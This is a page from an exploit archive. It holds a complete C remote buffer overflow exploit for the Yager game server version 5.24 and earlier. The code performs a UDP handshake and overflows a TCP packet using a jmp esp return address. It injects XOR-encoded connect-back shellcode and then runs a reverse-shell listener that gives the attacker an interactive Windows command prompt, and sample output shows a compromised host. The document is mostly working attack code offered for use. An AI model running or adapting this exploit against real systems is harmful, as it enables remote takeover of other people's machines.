[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Yager <= 5.24 Remote Buffer Overflow Exploit
# Published : 2005-04-25
# Author : cybertronic
# Previous Title : CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit
# Next Title : PMSoftware Simple Web Server (GET Request) Remote BoF Exploit
/*
*
* Yager <= 5.24 Remote Buffer Overflow Exploit
*
* cybertronic[at]gmx[dot]net
* 04/25/2005
*
* send all the money to Luigi Auriemma
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0xdeadc0de] crash server
* --[ 1 [0x300686bd] binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]
* >> 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:Yager>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT_UDP 34855
#define RED "E[31mE[1m"
#define GREEN "E[32mE[1m"
#define YELLOW "E[33mE[1m"
#define BLUE "E[34mE[1m"
#define NORMAL "E[m"
/*
*
* prototypes
*
*/
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, unsigned long ret );
int isip ( char *ip );
int send_handshake ( int s, struct sockaddr_in remote_addr );
int shell ( int s, char* tip, unsigned short cbport );
void header ();
void start_reverse_handler ( char* argv3 );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";
/*
*
* structures
*
*/
struct targets {
int num;
unsigned long ret;
char name[64];
}
target[]= {
{ 0, 0xdeadc0de, "crash server" },
{ 1, 0x300686bd, "binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]" } //push esp in binkw32.dll
};
/*
*
* functions
*
*/
int
exploit ( int s, unsigned long xoredcbip, unsigned short xoredcbport, unsigned long ret )
{
int r;
char buffer_pack[592];
printf ( "--[ exploiting WinXP Pro SP1 GERn" );
printf ( "--[ ret: 0x%08x [ jmp esp in binkw32.dll ]n", ret );
memcpy ( &reverseshell[111], &xoredcbip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
r = ~time ( NULL ) & 0xffff;
printf ( "--[ exploiting packet overflow...n" );
bzero ( &buffer_pack, sizeof ( buffer_pack ) );
memset ( buffer_pack, 0x41, 268 );
strncat ( buffer_pack, ( unsigned char* ) &ret, 4 );
strncat ( buffer_pack, "x41x41x41x41", 4 ); //4 bytes padding
memcpy ( buffer_pack + 276, reverseshell, sizeof ( reverseshell ) - 1 );
buffer_pack[0] = 0x00;
buffer_pack[1] = 0x00;
buffer_pack[2] = 0x00;
buffer_pack[3] = 0x00;
buffer_pack[4] = 0x46; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
buffer_pack[5] = 0x02; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
buffer_pack[6] = ( r & 0x00ff );
buffer_pack[7] = ( ( r & 0xff00 ) >> 8 );
buffer_pack[8] = 0x00;
buffer_pack[9] = 0x00;
printf ( "--[ sending packet..." );
if ( write ( s, buffer_pack, sizeof ( buffer_pack ) ) <= 0 )
{
printf ( "failed!n" );
return ( 1 );
}
printf ( "done!n" );
return ( 0 );
}
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
send_handshake ( int s, struct sockaddr_in remote_addr )
{
char* p;
char crap[23];
char in[2048];
unsigned short port;
bzero ( &crap, sizeof ( crap ) );
crap[0] = 0x59;
crap[1] = 0x5f;
crap[2] = 0x4e;
crap[3] = 0x45;
crap[4] = 0x54;
crap[5] = 0x5f;
crap[6] = 0x59;
crap[7] = 0x41;
crap[8] = 0x47;
crap[9] = 0x45;
crap[10] = 0x52;
crap[11] = 0x5f;
crap[12] = 0x43;
crap[13] = 0x4c;
crap[14] = 0x49;
crap[15] = 0x45;
crap[16] = 0x4e;
crap[17] = 0x54;
crap[18] = 0x00;
*( u_short* ) ( crap + 19 ) = ~time ( NULL );
crap[21] = 0x00;
crap[22] = 0x00;
printf ( "--[ sending handshake [UDP]..." );
if ( sendto ( s, crap, sizeof ( crap ), 0, ( struct sockaddr* ) &remote_addr, sizeof ( remote_addr ) ) < 0 )
{
printf ( "failed!n" );
return ( 1 );
}
printf ( "done!n" );
printf ( "--[ reading server response [UDP]..." );
bzero ( &in, sizeof ( in ) );
if ( recvfrom ( s, in, sizeof ( in ) -1, 0, NULL, NULL ) < 0 )
{
printf ( "failed!n" );
return ( 1 );
}
printf ( "done!n" );
p = in + 19;
port = ntohs ( *( u_short * ) p );
printf ( "--[ server port: %dn", port );
return ( port );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
usleep(10);
}
}
void
header ()
{
printf ( " __ __ _ n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ n" );
printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ n" );
printf ( "\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ n" );
printf ( " /____/ nn" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}
void
start_reverse_handler ( char* argv3 )
{
int s1, s2;
unsigned short cbport;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
sscanf ( argv3, "%u", &cbport );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!n" );
exit ( 1 );
}
printf ( "done!n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:t%sn", inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
int
main ( int argc, char* argv[] )
{
int s1, s2, targ, i;
unsigned long xoredcbip;
unsigned short cbport, xoredcbport, port;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 4 )
{
printf ( "Usage: %s <ip> <cbip> <cbport>n", argv[0] );
exit ( 1 );
}
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
{
printf ( "Invalid Target IP!n" );
exit ( 1 );
}
if ( !isip ( argv[2] ) )
{
printf ( "Invalid connect back IP!n" );
exit ( 1 );
}
printf("--[ select targetn");
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %sn", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
if ( targ != 0 )
if ( targ != 1 )
{
printf ( "--[ invalid target!n" );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve "%s"n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT_UDP );
if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 )
{
printf ( "handshake FAILED!n" );
exit ( 1 );
}
close ( s1 );
if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port );
remote_addr.sin_port = htons ( port );
if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!n" );
exit ( 1 );
}
printf ( "done!n" );
xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1 )
{
printf ( "exploitation FAILED!n" );
exit ( 1 );
}
close ( s2 );
start_reverse_handler ( argv[3] );
}
// www.Syue.com [2005-04-25]